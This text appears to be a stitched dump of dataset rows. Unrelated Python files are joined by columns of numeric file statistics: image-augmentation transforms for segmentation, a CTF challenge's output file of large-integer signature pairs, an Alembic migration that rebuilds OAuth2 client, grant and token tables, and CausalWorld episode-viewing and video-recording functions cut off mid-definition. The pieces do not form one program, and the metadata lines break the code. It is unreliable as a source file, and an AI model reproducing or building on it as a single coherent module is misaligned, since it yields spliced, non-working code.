    """Take a random crop_size x crop_size crop from image and mask."""

    def __init__(self, crop_size=320):
        self.crop_size = crop_size

    def __call__(self, sample):
        image, mask = sample['image'], sample['label']
        w, h = image.size
        left = random.randint(0, w - self.crop_size)
        top = random.randint(0, h - self.crop_size)
        box = (left, top, left + self.crop_size, top + self.crop_size)
        return {'image': image.crop(box), 'label': mask.crop(box)}
class RandomScale(object):
    """Rescale image and mask by a factor drawn uniformly from `scales`."""

    def __init__(self, scales=(1,)):
        # Candidate scale factors; one is chosen at random per call.
        self.scales = scales

    def __call__(self, sample):
        img = sample['image']
        mask = sample['label']
        w, h = img.size
        scale = random.choice(self.scales)
        w, h = int(w * scale), int(h * scale)
        # Bug fix: the scaled size was computed but never applied, making the
        # transform a no-op. Resize both image and mask to the chosen size.
        img = img.resize((w, h), Image.BILINEAR)
        mask = mask.resize((w, h), Image.NEAREST)
        return {'image': img,
                'label': mask}
class TransformTr(object):
    """Training-time transform pipeline.

    With ``multi_scale=None`` only a fixed resize is applied. Otherwise the
    pipeline adds random scaling, random cropping, normalization and tensor
    conversion; ``crop_size``, ``mean`` and ``std`` must then be supplied.
    """

    def __init__(self, resize, multi_scale=None, crop_size=None, mean=None, std=None):
        # Bug fix: the multi-scale branch referenced undefined names
        # (`args`, `mean`, `std`), raising NameError. The needed values are
        # now backward-compatible keyword parameters with defaults.
        if multi_scale is None:
            self.composed_transforms = transforms.Compose([
                FixedResize(resize=resize),
                # RandomCrop(crop_size=args.crop_size),
                # tr.RandomScaleCrop(base_size=self.args.base_size, crop_size=self.args.crop_size, fill=255),
                # tr.RandomGaussianBlur(),
                # Normalize(mean, std),
                # ToTensor()
            ])
        else:
            self.composed_transforms = transforms.Compose([
                FixedResize(resize=resize),
                RandomScale(scales=multi_scale),
                RandomCrop(crop_size=crop_size),
                # tr.RandomScaleCrop(base_size=self.args.base_size, crop_size=self.args.crop_size, fill=255),
                # tr.RandomGaussianBlur(),
                Normalize(mean, std),
                ToTensor()])

    def __call__(self, sample):
        # Apply the configured pipeline to a {'image', 'label'} sample.
        return self.composed_transforms(sample)
class TransformVal(object):
    """Validation-time pipeline: resize, center-crop, normalize, tensorize."""

    def __init__(self, args, mean, std):
        steps = [
            FixedResize(resize=args.resize),
            FixScaleCrop(crop_size=args.crop_size),  # TODO:CHECK THIS
            Normalize(mean, std),
            ToTensor(),
        ]
        self.composed_transforms = transforms.Compose(steps)

    def __call__(self, sample):
        # Apply the configured pipeline to a {'image', 'label'} sample.
        return self.composed_transforms(sample)
| 38.336434
| 131
| 0.576576
| 3,512
| 24,727
| 3.900342
| 0.065774
| 0.040882
| 0.025551
| 0.038473
| 0.836691
| 0.823697
| 0.802015
| 0.792816
| 0.776756
| 0.75522
| 0
| 0.034569
| 0.27468
| 24,727
| 644
| 132
| 38.395963
| 0.729189
| 0.124358
| 0
| 0.752193
| 0
| 0
| 0.02804
| 0
| 0
| 0
| 0
| 0.001553
| 0.002193
| 1
| 0.127193
| false
| 0.002193
| 0.02193
| 0.004386
| 0.280702
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a01f286ce34a187cec021722e7bce14373779bc8
| 19,736
|
py
|
Python
|
crypto/Sign_Wars/solver/output.py
|
SECCON/SECCON2021_online_CTF
|
628008ae2d150723352aed2c95abff41501c51f2
|
[
"Apache-2.0"
] | 7
|
2022-02-07T10:15:22.000Z
|
2022-02-10T07:13:07.000Z
|
crypto/Sign_Wars/solver/output.py
|
SECCON/SECCON2021_online_CTF
|
628008ae2d150723352aed2c95abff41501c51f2
|
[
"Apache-2.0"
] | null | null | null |
crypto/Sign_Wars/solver/output.py
|
SECCON/SECCON2021_online_CTF
|
628008ae2d150723352aed2c95abff41501c51f2
|
[
"Apache-2.0"
] | null | null | null |
sigs1 = [(12122920644857436418668108677431446821511965161835906257619686170008223981633617118848536864333256883344783807472533, 14197268540776373741177673820089672023976732299858030846681305575389640921071188098294211283607291412628404706330635), (30023311263693682916692119631904793161812704258670063725046946028381482586508452744969994191586576481159969039892535, 16094000621518284822857020964974522983541224425681758135622160784082988267314022122458996489586892811938506732931748), (20274365333087648992099914855887452427265725062234768121150756210734918282305324594709095440941680006674472249980168, 26128948049631412381227970242480771408976962602375493955244402440727109476811862753343673422200707132102306861245065), (30768939097894626895378677401324579041720728810052060616179712179254924186139940391745214635086621700092451846257475, 23800973758418165064781275855199658315920145808589994209139192398347876290686870300287776343940629270010735723235385), (28473557828088061979399196473136471402585047600303142695341163640729652130707043952255899907766676152597539289628315, 28281625820520087035698954279133768588017050298800453267610958044101108252535161164763310762642756504428205563108030), (961118250385917764507600420510572217848406774402919254807074729943580199634194943936928534369937371624710732726857, 24031640471683802687061395705285266808842836983869848057857017127967668008272515010890509063551366550912420338902834), (19370494654235267454217217719890760732479633443331393690560476118111139682942513564572505092689607226193201989778575, 2433781820944268337733283393291854175920938847482642777771696759267025446311242119383222969981818996711424713151752), (30779090043894032830605276175884042975994811516472755795216312382846355682168692296678880256197033821390044997147420, 4893123418105561169402880287889300261310663472852291300562230045024356786173678817075957809203454759484532173136896), 
(14643705489977528788970058117566828771249298225825962912655208159781673578193298484890200020885473583280037544119578, 15935318488540400173648065087608623889419958306790544362968141852933585912044021990423536612481693468915965522445032), (26190847735254363003436975683906714419695452818227446664219556609524851687182160032913188662574521358473164521270318, 1593531527201615623099098664942415943763347197253061444470827851943278116759392933621884906245655648264221554908273), (2444983458103763169338770323724579409115782087673217289810500838726321984003897473707801517318376539252731600634354, 31519693975000372684536588360058886155393128374920715958105917368560178529829092541542334254564649031015390295526257), (5539202944379041047645815730619570855915700610921747198866014997007285622810384696777658611658354790466198556409538, 20332957999843652613921660609152489318731466697459198872422541589848932160246010821103577261742306246402279741839395), (29969504934312616092773577215293054327868412131595687908164133237389228991764362661689008330244463167067377417804848, 23502790732595477415220062415069646202303453814634558339724957279860279173977141614843448086419994681526804050994011), (28663099246038192816273570466053103880330161954725039364215397713591731084208919109404788115439838323705057354906183, 32343362746546345028906807296090845637927648209201182279186066312617262402540993950717856425293636562311369826695241), (37811425966842340383821228402925951424928841073943712670686829246012732634532778206829440348798738360996829177934659, 1512161086988707363568355555539355341485927942150807857139424735463213909258176919376930783632168090029799006962452), (6779019396487335250176376177316480940562897505935292947586838966405847326392683369310422331267556304950213385562403, 21277628400501469478914168423023057684740585069176201105893608414023541256985765180901007757435611069875893412465586), 
(6366948926057872251073324724715646697709396244107534411996999604518484325522941417643164680481781327650121512161589, 31835229197999276237723592037000880402276309404799202930304320555417861589116989270114086456362377584676026798317441), (15281845709607491920369813817013377362178255708702641554534892473368410191641487999506001924287614983557554388444790, 2984115935788221541188290047888309109458147722093547866020985007410124451071701982135991689832422756636714734848410), (17261327950609380032505415413729345506837563477802335104261903199945292046286371909764527605537844250765520460420883, 4414083024903566067346682354660036193755195663970474589205389345245255956774402052618861533800845720100684618788066), (23285217326555475016519552330905568382923977489456237456732496253903350233528472100890947226393609572097915969599580, 15864787645844524123645508552473833769050437498168559566442342764983309617043514215685980718642756051823094216138112), (38735613502207617543460798902089924117030110156904845492417889885452926231509412677457364662728826603870166089048783, 2764799580566369130997255183073579096790304637375189258729225097121531798414933779603126159724061297478107963529944), (34397686468933908386713398593117199247477408535310063872486364205758893481567076156685158122992765644664863620408441, 32278070177934959080616216483052122171696315094028362684579162316990518944414668141213923548802330689237360305444057), (36888596144580310076666982554379754727579693141157953039821763246320596624002076072694376360349327605151628461938344, 20359599307803961599163637268447617008934461534173375543520973121462531279483793982707344429872033956688432496029494), (35731945369165024527067708422190934453114426930189147171662677061124488912009487138831725596607769036223677431254394, 38690463610329621441610277699868091296837875356478232771729649752351130839647804626642276143604085382240751091874980), 
(23677628634176723569940322462564200990434883563619558260828733247431579872437268289228719660272457754577432647629267, 5694960089075991074464290708570332306998548315951489339220678741537951501152608587055469175810163056202380723484162), (36183304484234246866110911449167537754372333309427114844147387618829024530231991189605158113348204109845980352696465, 23965168344478037213105641624609514777278543321778037076016154890855496855531577133265749426868642365368798849451496), (33162978581198415974999091637775219015609843478885981431365405627376986149964493390352996432902431398214990453120700, 17522675770165519045405383886383499046920674272323023864859028070652034097791735019059447013185908178315975726718027), (37977524287531621731269652998518444039221788561001084681446374543680582455529006667074181965831283556770601026406412, 34014871750340380154692206012455554620218508761966344769331999972401940089831171697348255247018267326994810496665301), (1507013781859412581460229968016871686472000162722420853292672399595213588246897578540619347856535893357627270900677, 7123198841569413454577310078272821534024280579100722414329202844057424863366193509058084349838170744321137899380851), (16162098325755207229063189997383396611921725235544867443071126936768120496007100174087010708793986788501933456531117, 35843125491563878831891747420494968566047358046579202101829199006631647636438358745741154644883785641557638179703196), (27146246587667190740076698462480327352334872042637035686499133830505424921309618795732649623443166432157485441206513, 29374852723618836996041990307719900335299612538156861129617267376582701400599574166091116228943846822827095705431420), (20318873596559259511055531147506382540328039101211632617939893607230146992770755366357547004154440123877927279562805, 21880244506505391597381900288791130929029500377960791610120410522262499720103003893165761379437860585723438454338357), 
(2677089679217144714677235060642211123498261589343453643587089980258267670810054471717380695130400677765718942750715, 22811216118007709181671732510261424038689262085998138698823325592895788252084744051591190795979078528619437443272430), (28242261012068041277293540110291951864968606243755362285072828317158908834811289543798540567848975185502994215611619, 28337300861435742639020944587343125537033416178222051556584188414720653042082343068603170738957875834942311839398955), (21313784566242236288558209540398728358450102518073033970974355085249250643681779922552823541265620185702575612865123, 25973923581441774490467725510310356393118571760442289368631380634139185801852675014798484820655377425355874214608838), (3972247474338783322467875314927935482812576258324764658865475177091575186850519760736477068863287011253657979695035, 1949243324150001215851803463575673078965313534368782887187770074096642168523503805499517384914614086023503127806847), (1151944487736036555640946065337093366220353301888076465796765130037778971904962274932934887966419998200175365995781, 19564575441055199178132952897543045993451659948447588920651596150288550414960098453945167530353880987093029030638144), (34162335734397557091228494111777449419659314364130585745202913773828419992559542465196157154618586692393424347136785, 34816069361672535828713924897177961374080352312052306803897119805834580104455380505473277752161016451540002438069017), (6214420518977400720115040915606936189332457649954029722703185627542783153439822172938794340141280694328697860997151, 35036609860976357406366810820445499231048373436931375253989834911997779342195269560660560149275988782146654615055395), (17932296848485476028307829364900722350664622103067434376880482465660776884118027615894824834062520974562950696190800, 25284454559391441356742861992714899157880349238554132025565451660342323497911181209889041052025003714876311648649308), 
(16729838562359475474212958363183560420250559702291016364521051500450026103395443198630456476103970943753669154249375, 32346909821898954875794104426207252965578694675212598600013619876939291316966520281348030524571180602992351937324549), (18383357524600760202019477696462766408564829389632201092711392752822975200725339011191785469174324590811632757501470, 36650204800420829652120261290123142229312040551658496656556239024215868372978503733453573308931372634821353503537954), (12679474326846184225965528024726547768506690550379875402442700592477187625032566343282886015393973299453970347716666, 31594434445787142355786158780673084733603186104893515951267587710628733125154787164728421585888101421671404571441460), (1460155946173513465605000753006943939473815980031454177632679861455928714118380298806901823644725063756743440478323, 28595065903087426074566358753005915622433302916683368431103530322432724436087166807363512661383021500064699866636573), (1712191697812545578149205758294464160112058894608923583568724616471266315677289849142337215940784518880963429394123, 15549321728923260877275319522523938368845573355479005888471636555747793775030205015093656278438688710952666664504896), (27247850567913925982695067834491518101584714379758703325384826250084810338850873054903173768682909886315224820151843, 18441987213600418235028717811172592400392968984874201495657937932256496057636260779718506455774046512049959224326533), (23125206105423712170494578086460408200155706950388584751758217770641881139847092343076320949651253557057860975699290, 617384558916714490913646402391877958626488085682864653677413549966260928717156654411337297014822767990795093863229), (10309859796084513086949474325745742289943652601164042295798749216013816749262406978527658506169631041432182034483264, 3401470346181096624340649421457463749621102267436616681750603386976006189520143441710738979453350404845158395485486), 
(16368609105601996512123657503983976901814846135585476552914466414979175179581723778823773810904335136988607343388641, 12887327683770298631686858909410191002874101297863064763857850276211374735131663350575035482893318627486961140493060), (12597783086712780955829102511325977339556480314456317226084059427852975744410298400466570369739729859822682094743763, 18143629657739573817392351951162537846408025200449845703036545707816887229856135678162116712273281752461460773286157), (18149765203212365095922365541429595804115110638460797557247425663278065057761683694963435074306083146559748910820933, 4623808735710466757897562443056494514986872251154643072124080945722371896930429940197336707416267350592331887509370), (36685770489292450862829854673422281288659959443468144451918042753101522158121942740628396053876144087903556902670459, 25427602196870003078247382997147130945403862270376348600679340464766087619183853473530884327535652383782148396318369), (26400994935887323685812785588779777604807033818459784383379336636723016041989131355813709350621150638600337397745755, 35441443644761879722810537983899640132591168390041946180094287752185744760148684344825560100034902852843703022913572), (21549464322285949487974060839290414317291085580470644413175603703659811599686802128539665387707492575120952990974169, 27426668476821276280862019979056999027369355304092859933896625743859680072036382523929860072977660288769061968841056), (17945055270149004672174407200101186426733019188557222629374387229166321253248131455944582958258851086680992327717775, 22763432714358352994467634787642451136567944768237186044385733037319457391071748311079692136983455628393624590912773), (19679372898006128640291583077178951435604248960537272688952385068434563933226836358777706619530975918926211454093254, 22558450199634522395989325930989798822306499440080795289426594476903491433232767149595712438138190142613146382805102), 
(5053808002622613648696016012235196453213394765089545993472533920762659290879000238284401142373566610359754334503119, 25596265678131212259962460250737224350948937567171043241527736952385125964273084970352617767438577469728391374901104), (35021535942876477664620323193569084612777266590551110729944867045139787961246598034847607119451282633173220627617528, 24412900363309066203864154425415165066253353692376637520978763141267068333052991517573772819303004361631432100082761), (30382344157317014521174359938595199590313101376532894077961655976102849666994412986977757526700903573837979050569748, 36380054077835016119489703494179753668737802402599719907220000486624011084909818429478518718710302969894134810399414), (23392455319924374624407363218414017792726341637348154289368001919553092631539423722056128035028761955761251335231397, 24615969593765671009089175669046441351199855489516238368580612855661905474214253402259306074086838224100682009493110), (39043410087571658849777088723644840444773112471772958075589595817236649732325361138357268471190048890890922330173113, 24256166337102519478716198099822063504670413826816008063467295625641151486658627000887001654580846329391802379723304), (25198309246276017483121163348865597630643532403493815715878126594393814779012937502862557889192295110821475991529943, 31183736084868762605705341491981967451872193027043779034558377529784073696083378450370565887268611112401715464692322), (21490370993563026264971775993182460905215869236047670304210535706894812928914407971234995821500730800223031598266257, 30524538483293986209920139400952501355824771895617776073345360374702907548949007510552008565834914052456239691889902), (37366673614850776444692939328421732388527123695286819437966655615675408069366910860035074204029318799945903064048527, 17779215295739572760353458898043288811931339150166396214780752407992014275252723707803456409767620788479105600423376), 
(23880907135038389168803046756901468214206189168117058906553768830712533102670877117203361468021971439264847643087559, 36554798683087533081747521419888907675190192122029480300791517998074362122003489313160167552894436296245959628579534), (1839816617790796393877679129129689526692744195784843313918019394276687774692559082426410650970115204065124516740192, 33280887100325540541044876347841631022975706016854603366960877001893277240119020663116400162762880357011028194015505), (37860238532878533314237881709991803144640720532159211259802653676233680439794809051955788290617724291896314228484287, 2079530852252634619529204167324028013909690544367420298080750988365566999876311319237386168370876748621061304030325), (33076401294910426866408725898185517353797089714631638085904654063741185770239407827102674966897738352568845852795461, 32388782563029207071708238813265723145823101733798639269010838632868478704546695027802504168693070745244529700498871), (19664630416995907039268499340971147354543906991316471257330973370399289180202716179184726176333997501833047008445188, 15010332454096306874561434765152776137424843532232617982537812287828972466131420109345949260515569323587248864746943), (25871769372685370569925822425693820620619794598214474123600511253778185796962172073208206762818745309605540739100621, 12733332659612677892428319839726866498876500931386736309794894873372522229292842342178191364595143966422220824826073), (12769045455084894273436527159204816902432305644017210629296787933904295785281457448881044929402038399496940189044093, 11594689177180251431669445510565369712938818714831055440921516382728285369019679675944135089038247905820859659761517), (1865703770871313754195006900013207845562542245675070113698481870088723236246390202799490489472079377268354306242668, 5125550573798542551697831171912361478992101952449490976854228951650529010822626202419835861052330070344633285976669), 
(37096662612327463148937337171394483039720908237996642157433470567568444060739072904671016601404440533704833919544285, 4790007747398249736115034551686542360219836448905259482276520130644298771477774260329772071196479778643314968168876), (31170630741028077467666117690922124046397732731173001565911078911132891410318903435039074418130660922292175028485161, 36700267333965429842826985729957565986107482356086995641315664499740118242353501066703906197210995388334971341587044), (16429305562010070045918008502995674904932019310071872766389089174936173832847431470110417157600205840910967654695105, 13348678473612360711357762565221644167552517488898971900250507563637477504294039445796012121832852740292220571524010), (36814999620410624650408927593101102311832288601200212772521220280747373268407838162653769833122342138193850888479316, 21678377395564601107395386759737337329969405189315349034054067649380849056748928922052454754064625128419150919292053), (37080204662579811419723925250553811343118062800721020347850990442377486549932418090303179252403198539322519694444276, 15821341762768738218228176979267566826815656142437698746345759451195866137662375460664107143767858376489559348158119), (31900665212807794653067892050991087787174739879112603157270515722601016232361976337248279931832041244757837789022461, 11910037530034363325480855721128870881334951395240192762039726365170413466292618778748338552446589898886095541743053), (22713234938446144853039935121713734891074107932043602957345904095128407091303028830418630224869359322276067322228220, 37648033797699949313050109414984677478246381964295991074283362304879984221990727828373537248000765921622593274507531), (26966642227721045071442724645484661519368889576738311756067876287666319883156972945382104473351822669036919304411830, 33837552398136675647634120649336283866568054003022435569393484219100126804419072284913749466938666527692475735307495)]
sigs2 = [(1049639883029709557497416807885448950887522866921671928450292553333188509467250311602354191758381412870243165308138, 34790284668131148498252310249426530965492667679223859021102993403672099203069041205214172414075756555276490789178956), (3085218467051892206002417901865728576393577451338770207618129262272350718747277968031614020531383301753358875936613, 35069145156217342955289020258826302551823920792084376060949622353808056721610402437441970841628302496074418474626297), (24094905265337534276165828047859782238987431219303883218554480297297861668847922558928617159973811943649844468445020, 9328776074819457901331657355801560516363178058099225535915537394781684440774078985119798155365962514386879323530606)]
| 6,578.666667
| 19,015
| 0.974362
| 168
| 19,736
| 114.464286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.982418
| 0.008614
| 19,736
| 2
| 19,016
| 9,868
| 0.000409
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ea3fc9e075d777316aa4907136d311c976659d5
| 5,497
|
py
|
Python
|
migrations/versions/22069cad6602_restructure_oauth2_models.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 7
|
2017-09-04T10:24:02.000Z
|
2019-12-02T13:12:30.000Z
|
migrations/versions/22069cad6602_restructure_oauth2_models.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 140
|
2017-09-06T07:02:18.000Z
|
2022-02-26T01:26:25.000Z
|
migrations/versions/22069cad6602_restructure_oauth2_models.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 2
|
2017-09-13T16:42:57.000Z
|
2018-02-15T15:32:40.000Z
|
"""Restructure OAuth2 models.
Revision ID: 22069cad6602
Revises: d7b1b886bf92
Create Date: 2017-11-02 13:41:43.920256
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import sqlalchemy as sa
from alembic import op
# Revision identifiers, used by Alembic.
revision = '22069cad6602'        # id of this migration
down_revision = 'd7b1b886bf92'   # previous migration in the chain
branch_labels = None
depends_on = None
def upgrade():
    """Re-create tables 'clients', 'grants' and 'tokens'.

    Destructive: the old tables are dropped first, so existing rows are
    NOT migrated.  Drop order (tokens, grants, clients) respects the
    foreign keys that reference 'clients'.
    """
    op.drop_table('tokens')
    op.drop_table('grants')
    op.drop_table('clients')
    # New 'clients': natural primary key on client_id (the old schema used
    # a surrogate integer id — see downgrade()); the secret must be unique.
    op.create_table(
        'clients',
        sa.Column('client_id', sa.String(length=32), nullable=False),
        sa.Column('client_secret', sa.String(length=256), nullable=False),
        sa.Column('created_by', sa.Integer(), nullable=False),
        sa.Column('is_confidential', sa.Boolean(), nullable=False),
        sa.Column('_redirect_uris', sa.Text(), nullable=False),
        sa.Column('_default_scopes', sa.Text(), nullable=False),
        sa.Column('name', sa.String(length=64), nullable=True),
        sa.Column('description', sa.String(length=400), nullable=True),
        sa.ForeignKeyConstraint(['created_by'], ['users.id'], ),
        sa.PrimaryKeyConstraint('client_id'),
        sa.UniqueConstraint('client_secret')
    )
    # 'grants' now references clients by client_id (string) and cascades
    # deletes from both clients and users.
    op.create_table(
        'grants',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('user_id', sa.Integer(), nullable=False),
        sa.Column('client_id', sa.String(length=32), nullable=False),
        sa.Column('code', sa.String(length=256), nullable=False),
        sa.Column('redirect_uri', sa.String(length=256), nullable=False),
        sa.Column('expires_at', sa.DateTime(), nullable=False),
        sa.Column('_scopes', sa.Text(), nullable=False),
        sa.ForeignKeyConstraint(['client_id'], ['clients.client_id'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id')
    )
    # 'tokens': both token strings are unique; same cascading FKs as grants.
    op.create_table(
        'tokens',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('user_id', sa.Integer(), nullable=False),
        sa.Column('client_id', sa.String(length=32), nullable=False),
        sa.Column('token_type', sa.String(length=40), nullable=False),
        sa.Column('access_token', sa.String(length=256), nullable=False),
        sa.Column('refresh_token', sa.String(length=256), nullable=False),
        sa.Column('expires_at', sa.DateTime(), nullable=False),
        sa.Column('_scopes', sa.Text(), nullable=False),
        sa.ForeignKeyConstraint(['client_id'], ['clients.client_id'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('access_token'),
        sa.UniqueConstraint('refresh_token')
    )
def downgrade():
    """Revert to old version of tables 'clients', 'grants' and 'tokens'.

    Destructive: the new tables are dropped first, so existing rows are
    NOT migrated back.  Note the old schema uses generic dialect types
    (INTEGER/VARCHAR/DATETIME/TEXT) and a surrogate integer 'clients.id'
    primary key that grants/tokens reference.
    """
    op.drop_table('tokens')
    op.drop_table('grants')
    op.drop_table('clients')
    # Old 'grants': client_id was an INTEGER FK to clients.id (the
    # surrogate key re-created below).
    op.create_table(
        'grants',
        sa.Column('id', sa.INTEGER(), nullable=False),
        sa.Column('user_id', sa.INTEGER(), nullable=False),
        sa.Column('client_id', sa.INTEGER(), nullable=False),
        sa.Column('code', sa.VARCHAR(length=256), nullable=False),
        sa.Column('redirect_uri', sa.VARCHAR(length=256), nullable=False),
        sa.Column('expires_at', sa.DATETIME(), nullable=False),
        sa.Column('_scopes', sa.TEXT(), nullable=False),
        sa.ForeignKeyConstraint(['client_id'], ['clients.id'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id')
    )
    op.create_table(
        'tokens',
        sa.Column('id', sa.INTEGER(), nullable=False),
        sa.Column('user_id', sa.INTEGER(), nullable=False),
        sa.Column('client_id', sa.INTEGER(), nullable=False),
        sa.Column('token_type', sa.VARCHAR(length=40), nullable=False),
        sa.Column('access_token', sa.VARCHAR(length=256), nullable=False),
        sa.Column('refresh_token', sa.VARCHAR(length=256), nullable=False),
        sa.Column('expires_at', sa.DATETIME(), nullable=False),
        sa.Column('_scopes', sa.TEXT(), nullable=False),
        sa.ForeignKeyConstraint(['client_id'], ['clients.id'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('access_token'),
        sa.UniqueConstraint('refresh_token')
    )
    # Old 'clients': surrogate integer PK, client_id merely unique, plus a
    # CHECK constraint for the boolean (SQLite-style 0/1 storage).
    op.create_table(
        'clients',
        sa.Column('id', sa.INTEGER(), nullable=False),
        sa.Column('client_id', sa.VARCHAR(length=64), nullable=False),
        sa.Column('client_secret', sa.VARCHAR(length=256), nullable=False),
        sa.Column('created_by', sa.INTEGER(), nullable=False),
        sa.Column('is_confidential', sa.BOOLEAN(), nullable=False),
        sa.Column('_redirect_uris', sa.TEXT(), nullable=False),
        sa.Column('_default_scopes', sa.TEXT(), nullable=False),
        sa.Column('name', sa.VARCHAR(length=64), nullable=True),
        sa.Column('description', sa.VARCHAR(length=400), nullable=True),
        sa.CheckConstraint('is_confidential IN (0, 1)'),
        sa.ForeignKeyConstraint(['created_by'], ['users.id'], ),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('client_id'),
        sa.UniqueConstraint('client_secret')
    )
| 42.945313
| 90
| 0.643806
| 653
| 5,497
| 5.292496
| 0.156202
| 0.108796
| 0.186632
| 0.236979
| 0.878762
| 0.853877
| 0.821759
| 0.802373
| 0.734086
| 0.655671
| 0
| 0.023736
| 0.179916
| 5,497
| 127
| 91
| 43.283465
| 0.742902
| 0.049482
| 0
| 0.586538
| 0
| 0
| 0.172268
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019231
| false
| 0
| 0.028846
| 0
| 0.048077
| 0.009615
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4eb0273a0dde3fffb286aa8461e3553bf997542b
| 10,711
|
py
|
Python
|
causal_world/viewers/task_viewer.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | 2
|
2021-09-22T08:20:12.000Z
|
2021-11-16T14:20:45.000Z
|
causal_world/viewers/task_viewer.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | null | null | null |
causal_world/viewers/task_viewer.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | null | null | null |
from causal_world.envs.causalworld import CausalWorld
from gym.wrappers.monitoring.video_recorder import VideoRecorder
from causal_world.task_generators.task import generate_task
import numpy as np
def view_episode(episode,
                 env_wrappers=np.array([]),
                 env_wrappers_args=np.array([])):
    """
    Visualizes a logged episode in the GUI

    :param episode: (Episode) the logged episode
    :param env_wrappers: (list) a list of gym wrappers
    :param env_wrappers_args: (list) a list of kwargs for the gym wrappers

    :return:
    """
    skip_frame = episode.world_params["skip_frame"]
    env = get_world(episode.task_name,
                    episode.task_params,
                    episode.world_params,
                    enable_visualization=True,
                    env_wrappers=env_wrappers,
                    env_wrappers_args=env_wrappers_args)
    env.reset()
    env.set_starting_state(episode.initial_full_state, check_bounds=False)
    trajectory = zip(episode.timestamps, episode.observations,
                     episode.rewards, episode.robot_actions)
    for _time, _obs, _reward, action in trajectory:
        # Replay each logged action for the same number of simulator
        # sub-steps the environment originally skipped per action.
        for _ in range(skip_frame):
            env.step(action)
    env.close()
def view_policy(task,
                world_params,
                policy_fn,
                max_time_steps,
                number_of_resets,
                env_wrappers=np.array([]),
                env_wrappers_args=np.array([])):
    """
    Visualizes a policy for a specified environment in the GUI

    :param task: (Task) the task of the environment
    :param world_params: (dict) the world_params of the environment
    :param policy_fn: the policy to be evaluated
    :param max_time_steps: (int) the maximum number of time steps per episode
    :param number_of_resets: (int) the number of resets/episodes to be viewed
    :param env_wrappers: (list) a list of gym wrappers
    :param env_wrappers_args: (list) a list of kwargs for the gym wrappers

    :return:
    """
    skip_frame = world_params["skip_frame"]
    steps_per_episode = int(max_time_steps / number_of_resets)
    env = get_world(task.get_task_name(),
                    task.get_task_params(),
                    world_params,
                    enable_visualization=True,
                    env_wrappers=env_wrappers,
                    env_wrappers_args=env_wrappers_args)
    for _episode in range(number_of_resets):
        obs = env.reset()
        for _step in range(steps_per_episode):
            # Query the policy once, then hold the action for the
            # skipped simulator sub-steps.
            action = policy_fn(obs)
            for _ in range(skip_frame):
                obs, _reward, _done, _info = env.step(action=action)
    env.close()
def record_video_of_policy(task,
                           world_params,
                           policy_fn,
                           file_name,
                           number_of_resets,
                           max_time_steps=100,
                           env_wrappers=np.array([]),
                           env_wrappers_args=np.array([])):
    """
    Records a video of a policy for a specified environment

    :param task: (Task) the task of the environment
    :param world_params: (dict) the world_params of the environment
    :param policy_fn: the policy to be evaluated
    :param file_name: (str) full path where the video is being stored.
    :param number_of_resets: (int) the number of resets/episodes to be viewed
    :param max_time_steps: (int) the maximum number of time steps per episode
    :param env_wrappers: (list) a list of gym wrappers
    :param env_wrappers_args: (list) a list of kwargs for the gym wrappers

    :return:
    """
    skip_frame = world_params["skip_frame"]
    env = get_world(task.get_task_name(),
                    task.get_task_params(),
                    world_params,
                    enable_visualization=False,
                    env_wrappers=env_wrappers,
                    env_wrappers_args=env_wrappers_args)
    recorder = VideoRecorder(env, "{}.mp4".format(file_name))
    for _episode in range(number_of_resets):
        obs = env.reset()
        recorder.capture_frame()
        for _step in range(max_time_steps):
            # One policy query per control step; capture every simulator
            # sub-step so the video shows the skipped frames too.
            action = policy_fn(obs)
            for _ in range(skip_frame):
                obs, _reward, _done, _info = env.step(action=action)
                recorder.capture_frame()
    recorder.close()
    env.close()
def record_video_of_random_policy(task,
                                  world_params,
                                  file_name,
                                  number_of_resets,
                                  max_time_steps=100,
